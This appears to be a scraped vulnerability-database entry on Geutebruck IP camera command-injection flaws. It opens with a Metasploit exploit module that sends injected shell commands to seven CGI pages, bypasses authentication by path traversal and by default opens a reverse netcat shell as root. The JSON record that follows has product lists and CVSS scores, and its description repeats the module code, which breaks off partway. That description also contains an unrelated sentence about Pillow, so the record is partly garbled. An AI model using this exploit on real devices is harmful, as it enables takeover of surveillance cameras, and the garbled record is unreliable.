    def initialize(info = {}) super( update_info( info, 'Name' => 'Geutebruck Multiple Remote Command Execution', 'Description' => %q{ This module bypasses the HTTP basic authentication used to access the /uapi-cgi/ folder and exploits multiple authenticated arbitrary command execution vulnerabilities within the parameters of various pages on Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx, EFD-22xx, ETHC-22xx, and EWPC-22xx devices running firmware versions <= 1.12.0.27 as well as firmware versions 1.12.13.2 and 1.12.14.5. Successful exploitation results in remote code execution as the root user. },

        'Author' => [
          'Titouan Lazard', # Of RandoriSec - Discovery
          'Ibrahim Ayadhi', # Of RandoriSec - Discovery and Metasploit Module
          'Sébastien Charbonnier' # Of RandoriSec - Metasploit Module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2021-33543'],
          ['CVE', '2021-33544'],
          ['CVE', '2021-33548'],
          ['CVE', '2021-33550'],
          ['CVE', '2021-33551'],
          ['CVE', '2021-33552'],
          ['CVE', '2021-33553'],
          ['CVE', '2021-33554'],
          [ 'URL', 'http://geutebruck.com' ],
          [ 'URL', 'https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/'],
          [ 'URL', 'https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03']
        ],
        'DisclosureDate' => '2021-07-08',
        'Privileged' => true,
        'Platform' => ['unix', 'linux'],
        'Arch' => [ARCH_CMD],
        'Targets' => [
          [
            'CVE-2021-33544 - certmngr.cgi', {
              'http_method' => 'GET',
              'http_vars' => {
                'action' => 'createselfcert',
                'local' => Rex::Text.rand_text_alphanumeric(10..16),
                'country' => Rex::Text.rand_text_alphanumeric(2),
                'state' => '$(PLACEHOLDER_CMD)',
                'organization' => Rex::Text.rand_text_alphanumeric(10..16),
                'organizationunit' => Rex::Text.rand_text_alphanumeric(10..16),
                'commonname' => Rex::Text.rand_text_alphanumeric(10..16),
                'days' => Rex::Text.rand_text_numeric(2..4),
                'type' => Rex::Text.rand_text_numeric(2..4)
              },
              'uri' => '/../uapi-cgi/certmngr.cgi'
            }
          ],
          [
            'CVE-2021-33548 - factory.cgi', {
              'http_method' => 'GET',
              'http_vars' => { 'preserve' => '$(PLACEHOLDER_CMD)' },
              'uri' => '/../uapi-cgi/factory.cgi'
            }
          ],
          [
            'CVE-2021-33550 - language.cgi', {
              'http_method' => 'GET',
              'http_vars' => { 'date' => '$(PLACEHOLDER_CMD)' },
              'uri' => '/../uapi-cgi/language.cgi'
            }
          ],
          [
            'CVE-2021-33551 - oem.cgi', {
              'http_method' => 'GET',
              'http_vars' => {
                'action' => 'set',
                'enable' => 'yes',
                'environment.lang' => '$(PLACEHOLDER_CMD)'
              },
              'uri' => '/../uapi-cgi/oem.cgi'
            }
          ],
          [
            'CVE-2021-33552 - simple_reclistjs.cgi', {
              'http_method' => 'GET',
              'http_vars' => {
                'action' => 'get',
                'timekey' => Rex::Text.rand_text_numeric(2..4),
                'date' => '$(PLACEHOLDER_CMD)'
              },
              'uri' => '/../uapi-cgi/simple_reclistjs.cgi'
            }
          ],
          [
            'CVE-2021-33553 - testcmd.cgi', {
              'http_method' => 'GET',
              'http_vars' => { 'command' => 'PLACEHOLDER_CMD' },
              'uri' => '/../uapi-cgi/testcmd.cgi'
            }
          ],
          [
            'CVE-2021-33554 - tmpapp.cgi', {
              'http_method' => 'GET',
              'http_vars' => { 'appfile.filename' => '$(PLACEHOLDER_CMD)' },
              'uri' => '/../uapi-cgi/tmpapp.cgi'
            }
          ]
        ],
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping'
        },
        'Notes' => {
          'Stability' => ['CRASH_SAFE'],
          'Reliability' => ['REPEATABLE_SESSION'],
          'SideEffects' => ['ARTIFACTS_ON_DISK']
        }
      )
    )
    

    end

    def firmware res = send_request_cgi( 'method' => 'GET', 'uri' => '/brand.xml' ) unless res print_error('Connection failed!') return false end

    unless res&.body && !res.body.empty?
      print_error('Empty body in the response!')
      return false
    end
    
    res_xml = res.get_xml_document
    if res_xml.at('//firmware').nil?
      print_error('Target did not respond with a XML document containing the "firmware" element!')
      return false
    end
    raw_text = res_xml.at('//firmware').text
    if raw_text && raw_text.match(/\d\.\d{1,3}\.\d{1,3}\.\d{1,3}/)
      raw_text.match(/\d\.\d{1,3}\.\d{1,3}\.\d{1,3}/)[0]
    else
      print_error('Target responded with a XML document containing the "firmware" element but its not a valid version string!')
      false
    end
    

    end

    def check version = firmware if version == false return CheckCode::Unknown('Target did not respond with a valid XML response that we could retrieve the version from!') end

    rex_version = Rex::Version.new(version)
    vprint_status("Found Geutebruck version #{rex_version}")
    if rex_version <= Rex::Version.new('1.12.0.27') || rex_version == Rex::Version.new('1.12.13.2') || rex_version == Rex::Version.new('1.12.14.5')
      return CheckCode::Appears
    end
    
    CheckCode::Safe
    

    end

    def exploit print_status("#{rhost}:#{rport} - Setting up request...")

    method = target['http_method']
    if method == 'GET'
      http_method_vars = 'vars_get'
    else
      http_method_vars = 'vars_post'
    end
    
    http_vars = target['http_vars']
    http_vars.each do |(k, v)|
      if v.include? 'PLACEHOLDER_CMD'
        http_vars[k]['PLACEHOLDER_CMD'] = payload.encoded
      end
    end
    
    print_status("Sending CMD injection request to #{rhost}:#{rport}")
    send_request_cgi(
      {
        'method' => method,
        'uri' => target['uri'],
        http_method_vars => http_vars
      }
    )
    print_status('Exploit complete, you should get a shell as the root user!')
    

    end end

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202109-0860",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "g-code een-2010",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2110",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ebc-2112",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam efd-2250",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2275",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code een-2040",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2271",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ebc-2111",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2239",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2230",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ethc-2249",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-code een-2010",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam efd-2241",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2110",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code een-2040",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ewpc-2271",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ebc-2111",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ethc-2239",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam efd-2250",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ethc-2249",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2230",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2270",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-code eec-2400",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-code een-2010",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam efd-2241",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2240",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam efd-2251",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ethc-2230",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam efd-2241",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code eec-2400",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2270",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2249",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code eec-2400",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ethc-2240",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam efd-2251",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2275",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2112",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ewpc-2270",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ewpc-2275",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ebc-2110",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam efd-2250",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam efd-2251",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ethc-2240",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code een-2040",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2112",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2271",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2111",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ethc-2239",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "\u2025 * firmware    1.12.13.2    1.12.14.5"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* een-20xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* efd-22xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* ethc-22xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "\u2025 * g-cam"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* eec-2xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "works with the above firmware  s  e2 series camera models   encoders"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": null
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* ebc-21xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "\u2025 * g-code"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "( multiple products )"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* ewpc-22xx"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33551"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Titouan Lazard and Ibrahim Ayadhi from RandoriSec reported these vulnerabilities to CISA.",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2086"
          }
        ],
        "trust": 0.6
      },
      "cve": "CVE-2021-33551",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "PARTIAL",
                "baseScore": 6.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 8.0,
                "id": "CVE-2021-33551",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 1.0,
                "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 7.2,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 1.2,
                "id": "CVE-2021-33551",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "HIGH",
                "scope": "UNCHANGED",
                "trust": 2.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "OTHER",
                "availabilityImpact": "High",
                "baseScore": 7.2,
                "baseSeverity": "High",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "JVNDB-2021-002023",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "High",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2021-33551",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "info@cert.vde.com",
                "id": "CVE-2021-33551",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "OTHER",
                "id": "JVNDB-2021-002023",
                "trust": 0.8,
                "value": "High"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202107-2086",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202104-975",
                "trust": 0.6,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2086"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33551"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33551"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Multiple camera devices by UDP Technology, Geutebr\u00fcck and other vendors are vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code. GEUTEBRUCK Provided by the company G-Cam E2 and G-Code The following multiple vulnerabilities exist in. * Lack of authentication for important features (CWE-306) - CVE-2021-33543 \u2025 * Command injection (CWE-77) - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 \u2025 * Stack-based buffer overflow (CWE-121) - CVE-2021-33545 , CVE-2021-33546 , CVE-2021-33547 , CVE-2021-33549The expected impact depends on each vulnerability, but it may be affected as follows. * Confidential information stolen by a remote third party due to improper default user authentication settings - CVE-2021-33543 \u2025 * Arbitrary code executed by command injection by a remote third party - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 \u2025 * By a remote third party counter Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33545 \u2025 * By a remote third party name Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33546 \u2025 * By a remote third party profile Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33547 \u2025 * By a remote third party action Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33549. Pillow is a Python-based image processing library. \nThere is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements. ##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule \u003c Msf::Exploit::Remote\n  Rank = ExcellentRanking\n  include Msf::Exploit::Remote::HttpClient\n  include Msf::Exploit::CmdStager\n  prepend Msf::Exploit::Remote::AutoCheck\n\n  def initialize(info = {})\n    super(\n      update_info(\n        info,\n        \u0027Name\u0027 =\u003e \u0027Geutebruck Multiple Remote Command Execution\u0027,\n        \u0027Description\u0027 =\u003e %q{\n          This module bypasses the HTTP basic authentication used to access the /uapi-cgi/ folder\n          and exploits multiple authenticated arbitrary command execution vulnerabilities within\n          the parameters of various pages on Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx,\n          EFD-22xx, ETHC-22xx, and EWPC-22xx devices running firmware versions \u003c= 1.12.0.27 as\n          well as firmware versions 1.12.13.2 and 1.12.14.5. Successful exploitation results in\n          remote code execution as the root user. \n        },\n\n        \u0027Author\u0027 =\u003e [\n          \u0027Titouan Lazard\u0027, # Of RandoriSec - Discovery\n          \u0027Ibrahim Ayadhi\u0027, # Of RandoriSec - Discovery and Metasploit Module\n          \u0027S\u00e9bastien Charbonnier\u0027 # Of RandoriSec - Metasploit Module\n        ],\n        \u0027License\u0027 =\u003e MSF_LICENSE,\n        \u0027References\u0027 =\u003e [\n          [\u0027CVE\u0027, \u00272021-33543\u0027],\n          [\u0027CVE\u0027, \u00272021-33544\u0027],\n          [\u0027CVE\u0027, \u00272021-33548\u0027],\n          [\u0027CVE\u0027, \u00272021-33550\u0027],\n          [\u0027CVE\u0027, \u00272021-33551\u0027],\n          [\u0027CVE\u0027, \u00272021-33552\u0027],\n          [\u0027CVE\u0027, \u00272021-33553\u0027],\n          [\u0027CVE\u0027, \u00272021-33554\u0027],\n          [ \u0027URL\u0027, \u0027http://geutebruck.com\u0027 ],\n          [ \u0027URL\u0027, \u0027https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/\u0027],\n          [ \u0027URL\u0027, \u0027https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03\u0027]\n        ],\n        \u0027DisclosureDate\u0027 =\u003e \u00272021-07-08\u0027,\n        \u0027Privileged\u0027 =\u003e true,\n        \u0027Platform\u0027 =\u003e [\u0027unix\u0027, \u0027linux\u0027],\n        \u0027Arch\u0027 =\u003e [ARCH_CMD],\n        \u0027Targets\u0027 =\u003e [\n          [\n            \u0027CVE-2021-33544 - certmngr.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e {\n                \u0027action\u0027 =\u003e \u0027createselfcert\u0027,\n                \u0027local\u0027 =\u003e Rex::Text.rand_text_alphanumeric(10..16),\n                \u0027country\u0027 =\u003e Rex::Text.rand_text_alphanumeric(2),\n                \u0027state\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027,\n                \u0027organization\u0027 =\u003e Rex::Text.rand_text_alphanumeric(10..16),\n                \u0027organizationunit\u0027 =\u003e Rex::Text.rand_text_alphanumeric(10..16),\n                \u0027commonname\u0027 =\u003e Rex::Text.rand_text_alphanumeric(10..16),\n                \u0027days\u0027 =\u003e Rex::Text.rand_text_numeric(2..4),\n                \u0027type\u0027 =\u003e Rex::Text.rand_text_numeric(2..4)\n              },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/certmngr.cgi\u0027\n            }\n          ],\n          [\n            \u0027CVE-2021-33548 - factory.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e { \u0027preserve\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027 },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/factory.cgi\u0027\n            }\n          ],\n          [\n            \u0027CVE-2021-33550 - language.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e { \u0027date\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027 },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/language.cgi\u0027\n            }\n          ],\n          [\n            \u0027CVE-2021-33551 - oem.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e {\n                \u0027action\u0027 =\u003e \u0027set\u0027,\n                \u0027enable\u0027 =\u003e \u0027yes\u0027,\n                \u0027environment.lang\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027\n              },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/oem.cgi\u0027\n            }\n          ],\n          [\n            \u0027CVE-2021-33552 - simple_reclistjs.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e {\n                \u0027action\u0027 =\u003e \u0027get\u0027,\n                \u0027timekey\u0027 =\u003e Rex::Text.rand_text_numeric(2..4),\n                \u0027date\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027\n              },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/simple_reclistjs.cgi\u0027\n            }\n          ],\n          [\n            \u0027CVE-2021-33553 - testcmd.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e { \u0027command\u0027 =\u003e \u0027PLACEHOLDER_CMD\u0027 },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/testcmd.cgi\u0027\n            }\n          ],\n          [\n            \u0027CVE-2021-33554 - tmpapp.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e { \u0027appfile.filename\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027 },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/tmpapp.cgi\u0027\n            }\n          ]\n        ],\n        \u0027DefaultTarget\u0027 =\u003e 0,\n        \u0027DefaultOptions\u0027 =\u003e {\n          \u0027PAYLOAD\u0027 =\u003e \u0027cmd/unix/reverse_netcat_gaping\u0027\n        },\n        \u0027Notes\u0027 =\u003e {\n          \u0027Stability\u0027 =\u003e [\u0027CRASH_SAFE\u0027],\n          \u0027Reliability\u0027 =\u003e [\u0027REPEATABLE_SESSION\u0027],\n          \u0027SideEffects\u0027 =\u003e [\u0027ARTIFACTS_ON_DISK\u0027]\n        }\n      )\n    )\n  end\n\n  def firmware\n    res = send_request_cgi(\n      \u0027method\u0027 =\u003e \u0027GET\u0027,\n      \u0027uri\u0027 =\u003e \u0027/brand.xml\u0027\n    )\n    unless res\n      print_error(\u0027Connection failed!\u0027)\n      return false\n    end\n\n    unless res\u0026.body \u0026\u0026 !res.body.empty?\n      print_error(\u0027Empty body in the response!\u0027)\n      return false\n    end\n\n    res_xml = res.get_xml_document\n    if res_xml.at(\u0027//firmware\u0027).nil?\n      print_error(\u0027Target did not respond with a XML document containing the \"firmware\" element!\u0027)\n      return false\n    end\n    raw_text = res_xml.at(\u0027//firmware\u0027).text\n    if raw_text \u0026\u0026 raw_text.match(/\\d\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}/)\n      raw_text.match(/\\d\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}/)[0]\n    else\n      print_error(\u0027Target responded with a XML document containing the \"firmware\" element but its not a valid version string!\u0027)\n      false\n    end\n  end\n\n  def check\n    version = firmware\n    if version == false\n      return CheckCode::Unknown(\u0027Target did not respond with a valid XML response that we could retrieve the version from!\u0027)\n    end\n\n    rex_version = Rex::Version.new(version)\n    vprint_status(\"Found Geutebruck version #{rex_version}\")\n    if rex_version \u003c= Rex::Version.new(\u00271.12.0.27\u0027) || rex_version == Rex::Version.new(\u00271.12.13.2\u0027) || rex_version == Rex::Version.new(\u00271.12.14.5\u0027)\n      return CheckCode::Appears\n    end\n\n    CheckCode::Safe\n  end\n\n  def exploit\n    print_status(\"#{rhost}:#{rport} - Setting up request...\")\n\n    method = target[\u0027http_method\u0027]\n    if method == \u0027GET\u0027\n      http_method_vars = \u0027vars_get\u0027\n    else\n      http_method_vars = \u0027vars_post\u0027\n    end\n\n    http_vars = target[\u0027http_vars\u0027]\n    http_vars.each do |(k, v)|\n      if 